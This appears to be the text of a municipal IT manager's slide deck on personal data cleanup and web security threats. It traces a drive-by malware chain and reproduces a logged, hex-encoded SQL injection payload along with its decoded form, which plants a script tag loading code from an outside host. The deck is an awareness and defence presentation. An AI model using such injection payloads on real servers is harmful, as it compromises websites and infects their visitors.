330 likes | 513 Views
Steven Narvaez CCIO / ITSD Mgr. City of Deltona East Central Florida District Director FLGISA. 30 years of IT experience
E N D
Steven NarvaezCCIO / ITSD Mgr. City of DeltonaEast Central Florida District Director FLGISA 30 years of IT experience Two time winner of the Florida Local Government Information Systems Association (FLGISA.org) Technology Achievement Award Program under the category of "Most Innovative Use of Technology Award". FLGISA.ORG: What you need to know! WE ROCK!!!
Do You Really Know Where Your Personal Information Is? • See what information about you is available online • Check out Spokeoand Pipl • Massive amounts of data compiled from a variety of sources including public records and social networking sites about individuals. • Can be used by credit issuers, criminal profilers, employers, and others for any number of purposes, not necessarily intended by the data service providers.
Clean up the data you can control • Review your accounts • Three options: • remove the data • modify the privacy settings • request that the account be deleted. If you are going to request that the account be deleted, be sure to first remove all of the data. • Be sure to confirm that the account is deleted versus deactivated.
Request cleanup of data you don¹t control • Contact site owners. • Can’t find owners? • Look it up using the ³WHOIS² service for an administrative and technical contact for the site. • A “WHOIS” query can be done by visiting the website http://whois.net/ • Opt out of data service providers.
Request cleanup of data you don¹t control Data service providers provide lists of contact information to individuals or companies that request it. They often charge a fee for this information. Data service providers allow individuals to opt out of having their data published. Services are aggregators so the original source provider of the information will also likely have to be contacted to remove your information. The Privacy Rights Clearinghouse publishes the opt-out URL for over 240 of these types of services. Use a professional service. Be aggressive about maintaining a cycle of checking your public data and removing items which don¹t match your current risk tolerance.
For More Information: Please visit: Privacy Rights Clearinghouse Opt-Out Urls: www.privacyrights.org/online-information-brokers-list · Google support page for removal of data: http://support.google.com/webmasters/bin/answer.py?hl=en&answer=164133&topic=1724262&ctx=topic · IT World Article, ³Rescue your Online Reputation²: www.itworld.com/it-managementstrategy/212115/seven-ways-rescue-your-online-reputation?page=0,2 · Times Article ³How to Fix (or Kill) Web Data About You²: www.nytimes.com/2011/04/14/technology/personaltech/14basics.html?_r=0
Threat is real AND it is EVOLVING ALL THE TIME! US Power Co. cyber attacked 10,000 times a month! Could foreign hackers take out America's electric grid? A new congressional report says it's a very real threat, with more than a dozen of nearly 100 electric utilities surveyed reporting constant or frequent cyber attacks, Reuters reports. One utility said it was battered by a staggering 10,000 attacks a month; another reported daily such activity that is "automated and dynamic in nature, able to adapt to what is discovered during its probing process."
China ISP takes internet for a ride • Small Chinese ISP – IDC China Telecommunication briefly hijacked the internet by sending out wrong routing data • Re-transmitted wrong routing data by state-owned China Telecommunications, affected service providers around the world. • The event even made it into the '2010 US-China Economic and Security Review' commission report presented in November of that year to US Congress • For 18 minutes on April 8, China Telecom rerouted 15 percent of the internet's traffic through Chinese servers, affecting US government and military web sites. • Was / Is China testing a cyber attack capability? • China Telecom called the April traffic re-direction an accident.
China at Heart of Sweeping Cyber spying War on US The damage so far could range from $25 billion to $100 billion, or up to 0.5% of GDP government analysts report. Cyber spying is "just so widespread that it’s known to be a national issue at this point," says an Obama administration official. Russia, Israel, and France have also delved into electronic espionage Chinese officials deny such hacking. The New York Times and Wall Street Journal are among several newspapers to cite recent hacking, the Daily Intelligencer notes.
McAfee's Oopsie McAfee goofs up! Issued a faulty anti-virus update The now-infamous McAfee DAT file 5958 - which wreaked havoc on PCs of countless McAfee customers. Caused malfunctions like the Microsoft 'Blue Screen of Death' Created the effect of a denial-of-service.
HTTP: A Criminal’s Best Friend Understanding the Problem in Four Parts URL: Recipe for Disaster Web Browser Ecosystem Vulnerable Malware Defeats Anti-Virus Signatures Web Servers Vulnerable
The Web Page: A Security Primer How does a Web Page Work? • HTML: Web site “recipe.”Initial HTML retrieval provides “recipe". Browser then fetches all objects listed in initial HTML “recipe”. • Web Resources: The actual ingredients.Retrieved, per the HTML, from any specified location(s) Includes: • Images • Scripts • Executable objects (“plug-ins”) • Other web pages
BoingBoing.net: A popular blog • URLs in browser: 1 • HTTP Gets: 162 • Images: 66from 18 domains including 5 separate 1x1 pixel invisibletracking images • Scripts: 87 from 7 domains • Cookies: 118 from 15 domains • 8 Flash objects from 4domains
Recipe + Ingredients…Let’s cook! • Web page HTML is the recipe • Code snippets are website ingredients • The browser will fetcheach ingredient • Each ingredientinitiates a HTTPtransaction
Understanding the Problem in Four Parts URL: Recipe for Disaster Web Browser Ecosystem Vulnerable Malware Defeats Anti-Virus Signatures Web Servers Vulnerable
Web Browser Ecosystem Vulnerable • SANS Institute Top 20 Security Risks http://www.sans.org/top20/#c1 • IE and Firefox vulnerable • “…hundreds of vulnerabilities in ActiveX controls installed by software vendors have been discovered.” • Media Players & Browser Helper Objects (BHO) • RealPlayer, iTunes, Flash, QuickTime, Windows Media • Explosion of BHOs and third-party plug-ins • Plug-ins are installed (semi) transparently by website(s). Users unaware an at-risk helper object or plug-in is installed … introducing more avenues for hackers to exploit users visiting malicious web sites.
Understanding the Problem in Four Parts URL: Recipe for Disaster Web Browser Ecosystem Vulnerable Malware Defeats Anti-Virus Signatures Web Servers Vulnerable
Malware Defeats Anti-Virus Signatures • Criminals have developed tools to mutate malware to deflect signature-based detection. • At a DefCon hacking conference, teams of researchers proved their success yet again. • Seven viruses and two exploits, all well-known, were mutated to defeat multiple anti-virus engines • Winning time: 2 hours, 25 minutes
Attack Vector: Vulnerable Web Servers ** including open-source and custom-built applications SANS Institute Top 20 Security Risks http://www.sans.org/top20/#c1 “Web application vulnerabilities account for almost half the total number of vulnerabilities being discovered in the past year**. These vulnerabilities are being exploited widely to convert trusted web sites into malicious servers serving client-side exploits and phishing scams.”
SQL Injection Attacks • How does the attack work? • Web servers that present dynamic web pages often talk to databases to retrieve the data. • Web servers and databases use a popular language called Structured Query Language (SQL) to describe the data requested. • SQL can also insert new data and update existing data. • If a web server passes unvalidated input from fields on web forms to the database, attackers can take advantage of hacks to issue their own SQL commands. • Those hacks can inject malicious code into the database… • …and the web server will subsequently present this malicious code from the database to unsuspecting users when they visit the website. • The process renders a formally good website into a malicious one without the knowledge of the site owner or the site’s visitors!
Real-World SQL Injection HTTP Post made to thousands of web servers 2007-12-30 18:22:46 POST /crappyoutsourcedCMS.asp;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST (0×4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F0063002E007500630038003000310030002E0063006F006D002F0030002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000)); EXEC(@S);–178|80040e14|Unclosed_quotation_mark_before_the_character_string_’G;DECLARE_@S_NVARCHAR(4000); SET_@S=CAST(0×4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C00400043002000′. - 202.101.162.73 HTTP/1.0 Mozilla/3.0+(compatible;+Indy+Library) - 500 15248
SQL Injection Decoded • What that POST is attempting: • …exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+’'<script src=http://c.uc8010.com/0.js></script>’'')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor DECLARE @T varchar(255)… • Attack inserts script into text fields in database • <script src=http://?.uc8010.com/0.js></script> • Site owner unaware their site was hacked • Site visitors will fetch the malicious script • Script used to deliver any web attack
Hacked While Browsing Behind the Scenes
brookeseidl.com registered at eNom 2002 63.249.17.64 hosted at Seattle’s ZipCon with 52 other domains What’s Happening on BrookeSeidl.com • Script injected onto web page – one extra ingredient!
Browser fetches h.js javascript from tejary.net Tejary.net registered 2003 at GoDaddy and hosted on 68.178.160.68 in Arizona Registered by Aljuraid, Mr Nassir A in Saudi Arabia Tejary.net/h.js calls two remote iframe objects What Does Tejary.net/h.js Do?
What Does said7.com Do? Browser fetches /Bb/faq.htm from www.said7.com Said7.com Registered 2006 at NAMESECURE.COM Hosted on 74.52.143.60 at ThePlanet, Houston, TX Calls web form from 51yes.com Calls v3i9.cn/c.htm as iFrame <script language="javascript" src="http://count49.51yes.com/click.aspx?id=494953024&logo=11"></script> <iframesrc=http://www.v3i9.cn/c.htm width=100 height=0></iframe>
Exploit Resources Fetched from v3i9.cn It all starts with /c.htm loaded from tejary.net, said7.com Real Player Exploit • /ipp.htm – Real Player exploit CVE-2008-1309 • 2/40 AV anti-virus vendors detect, calls real.html. Includes f#!kyoukaspersky • /real.htm, /real.js – Real Player exploit CVE-2007-5601 MDAC (Microsoft Data Access Component) Exploit • /14.htm, /14.js – exploits Exploit-MS06-014 vulnerability in the MDAC functions Flash Exploit • /swfobject.js – detects flash version and selects according content • /flash.htm – Flash exploit. 2/40 anti-virus vendors detect • /igg.htm - ??? Called from /flash.htm for exploit?
What is Our Malware? • After successful exploit, malware installed from v3i9.cn • ce.exe = Gh0st malware Keylogging, web cam monitoring Persistent connection to China:58.253.68.68vobe.3322.org
Anti-Virus Won’t Protect us • Ce.exe analyzed on Virus Total 31% detection on days 1, 2 48% detection on day 3 • 21% detection for SMS.exe
Protection - Prevention “The cost of protecting ourselves against cybercrime can far exceed the cost of the threat itself … [therefore] we should spend less in anticipation of cybercrime and more on catching the perpetrators.” “We distinguish carefully between traditional crimes that are now ‘cyber’ because they are conducted online (such as tax and welfare fraud); transitional crimes whose modus operandi has changed substantially as a result of the move online (such as credit card fraud); new crimes that owe their existence to the Internet; and what we might call platform crimes such as the provision of botnets which facilitate other crimes rather than being used to extract money from victims directly.”
The Cost UK is spending ~$1 billion on efforts to protect against or clean-up after a threat, including $170 million on antivirus measures, but only $15 million is being spent on law enforcement to pursue cyber criminals. Shouldn’t we spend some time on stopping the threat by apprehending the criminals?